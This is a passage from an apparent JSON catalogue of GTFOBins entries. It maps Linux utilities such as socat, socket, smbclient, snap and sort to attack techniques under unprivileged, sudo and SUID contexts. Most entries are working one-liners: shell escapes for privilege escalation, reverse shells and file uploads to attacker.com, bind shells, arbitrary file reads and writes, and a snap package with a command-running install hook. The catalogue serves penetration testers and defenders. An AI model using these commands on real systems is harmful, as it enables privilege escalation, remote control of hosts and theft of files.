installation","aliases":[]},{"id":"gtfo:shuf:file-read:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-write:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-write:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-write:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:slsh:shell:0:sudo","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/slsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:slsh:shell:0:suid","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/slsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:slsh:shell:0:unprivileged","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/slsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:download:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:download:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:shell:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:shell:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:upload:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:upload:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:snap:command:0:sudo","toolId":"gtfo:snap","toolName":"snap","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"snap install xxxx_1.0_all.snap --dangerous --devmode","description":"Generate the Snap package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\nmkdir -p meta/hooks\necho -e '#!/bin/sh\\n/path/to/command; false' >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxx -s dir -t snap -a all meta\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/snap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:bind-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:bind-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:bind-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:download:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:download:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:download:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-read:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-read:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-read:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-write:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-write:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-write:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:reverse-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:reverse-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:reverse-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:upload:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:upload:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:upload:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:bind-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:bind-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:bind-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:reverse-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:reverse-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:reverse-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:soelim:file-read:0:sudo","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/soelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:soelim:file-read:0:suid","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/soelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:soelim:file-read:0:unprivileged","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/soelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:softlimit:shell:0:sudo","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/softlimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:softlimit:shell:0:suid","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/softlimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:softlimit:shell:0:unprivileged","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/softlimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-read:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-read:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-read:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-write:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-write:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-write:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:split:file-read:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of 